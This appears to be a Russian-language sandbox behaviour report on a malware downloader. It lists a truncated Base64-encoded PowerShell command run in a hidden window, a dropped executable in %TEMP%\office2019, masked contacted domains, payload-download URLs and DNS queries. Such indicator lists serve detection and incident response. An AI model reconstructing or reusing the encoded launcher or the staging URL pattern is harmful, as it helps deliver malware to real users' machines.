Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3824
- %TEMP%\office2019\ihz_2rk.exe
- 'th##ning.de':80
- 'co#####laesperanza.cl':80
- 'ne######icaltechnology.com':80
- 'se###sgo.com':80
- 'hu###omains.com':443
- 'fe###nform.de':80
- http://th##ning.de/cgi-bin/uo9wm/
- http://co#####laesperanza.cl/new_img/fuJUk/
- http://ne######icaltechnology.com/cgi-bin/SkB/
- http://se###sgo.com/e9x8b82yg/y651K/
- http://www.fe###nform.de/localization/n7g/
- 'hu###omains.com':443
- DNS ASK th##ning.de
- DNS ASK po#####lmypassion.com
- DNS ASK co#####laesperanza.cl
- DNS ASK ne######icaltechnology.com
- DNS ASK se###sgo.com
- DNS ASK hu###omains.com
- DNS ASK th####assive.com
- DNS ASK fe###nform.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAGcAMABqAHIAMwBwAD0AKAAnAFIAdgB6AG0ANgAnACsAJwBxAGcAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAEUATQBwAFwATwBGAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)